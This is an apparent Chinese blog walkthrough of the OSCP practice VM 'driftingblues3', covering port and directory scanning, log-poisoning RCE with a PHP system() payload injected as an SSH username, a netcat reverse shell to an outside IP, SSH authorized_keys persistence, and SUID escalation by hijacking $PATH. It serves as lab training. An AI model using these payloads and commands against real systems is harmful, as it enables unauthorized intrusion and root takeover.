【OSCP】driftingblues3

OSCP 靶场

靶场简介

driftingblues3

easy

信息收集与分析、日志getshell、公钥提权、$PATH滥用提权

信息收集

主机发现

nmap -sn 192.168.31.0/24

端口扫描

 nmap -p- --min-rate 10000 192.168.31.193

└─# nmap -sV -A -p- -T4 192.168.31.193      
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-23 03:07 EST
Nmap scan report for driftingblues (192.168.31.193)
Host is up (0.0055s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
|   256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_  256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/eventadmins
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: A4:83:E7:DF:96:AD (Apple)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   5.54 ms driftingblues (192.168.31.193)

目录扫描

gobuster dir -u http://192.168.31.193/ -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt

http://192.168.31.193/robots.txt
http://192.168.31.193/eventadmins
http://192.168.31.193//littlequeenofspades.html
http://192.168.31.193/wp-admin
http://192.168.31.193/secret/
http://192.168.31.193/drupal/
http://192.168.31.193/Makefile

找到了一个有用信息，提示说ssh 有问题，让我们检测如下一个页面

这里html 源码发现了一串base64 编码，解码后得到一个非常有用的目录

访问后，是个ssh 的登录日志，结合之前的爆破发现ssh 只能通过公钥登录，可能存在公钥泄露。

这里发现记录的是我刚才尝试登录的用户，那么该文件是php，可以尝试写入一句话

权限获取

<?php echo "9898"; system($_GET["a"]); ?>@192.168.31.193

接下来直接反弹一个shell，然后获取一个交互shell

nc 192.168.1.158 8989 -e /bin/bash

python3 -c 'import pty;pty.spawn("/bin/bash")'
或者
script /dev/null -c bash

Ctrl + Z
stty raw -echo ;fg
stty rows 38 columns 116
export TERM=xterm

权限提升

ssh 公钥提权

这里ssh目录下有写的权限，我们可以将 ssh 公钥添加到文件authorized_keys 中，然后使用公钥登录 robertjs 用户。

攻击者机器:
ssh-keygen -b 4096 -t rsa
一路回车回车默认就行,在/root/.ssh/目录下生成了两个文件
id_rsa、id_rsa.pub
cat /root/.ssh/id_rsa.pub

受害者机器:
vi /root/.ssh/authorized_keys
攻击者的id_rsa.pub内容粘贴到文件里面(如果原来存在内容就另起一行粘贴)
chmod 600 /root/.ssh/authorized_keys

攻击者利用公钥登录
ssh -i /root/.ssh/id_rsa [email protected]

suid 提权—$PATH 滥用

find / -type f -perm -u=s 2>/dev/null
或者
find / -perm -4000 -exec ls -al {} ; 2>/dev/null

这里发现执行该脚本后，输出一些信息，

我们下载getinfo 文件到kali上使用strings 查看字符串可以发现清楚的看到里面执行的命令。

PATH 是 Linux 和类 Unix 操作系统中的一个环境变量，它指定存储所有可执行程序的所有 bin 和 sbin 目录。当用户在终端上运行任何命令时，它会请求 shell 在 PATH 变量的帮助下搜索可执行文件，以响应用户执行的命令。超级用户通常还具有 /sbin 和 /usr/sbin 条目，以便轻松执行系统管理命令。

借助 echo 命令查看相关用户的路径非常简单。

echo $PATH  

/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

参考链接：www.hackingarticles.in/linux-privilege-escalation-using-path-variable/

二进制内执行了系统命令，我们可以尝试利用$path变量进行提权。在/tmp 目录下，创建一个cat文件，然后写入/bin/bash,加权限后，更改$PATH 变量，最后再去执行getinfo 文件

cd /tmp
echo "/bin/bash" > cat
chmod 777 cat
echo $PATH
export PATH=/tmp:$PATH  
#将 /tmp 目录添加到当前 PATH 环境变量的最前面
#将 /tmp 目录添加到当前 shell 的 PATH 变量的最前面，
#使系统在查找可执行文件时首先在 /tmp 目录中查找。


/usr/bin/getinfo
whoami

End

“点赞、在看与分享都是莫大的支持”

原文始发于微信公众号（贝雷帽SEC）：【OSCP】driftingblues3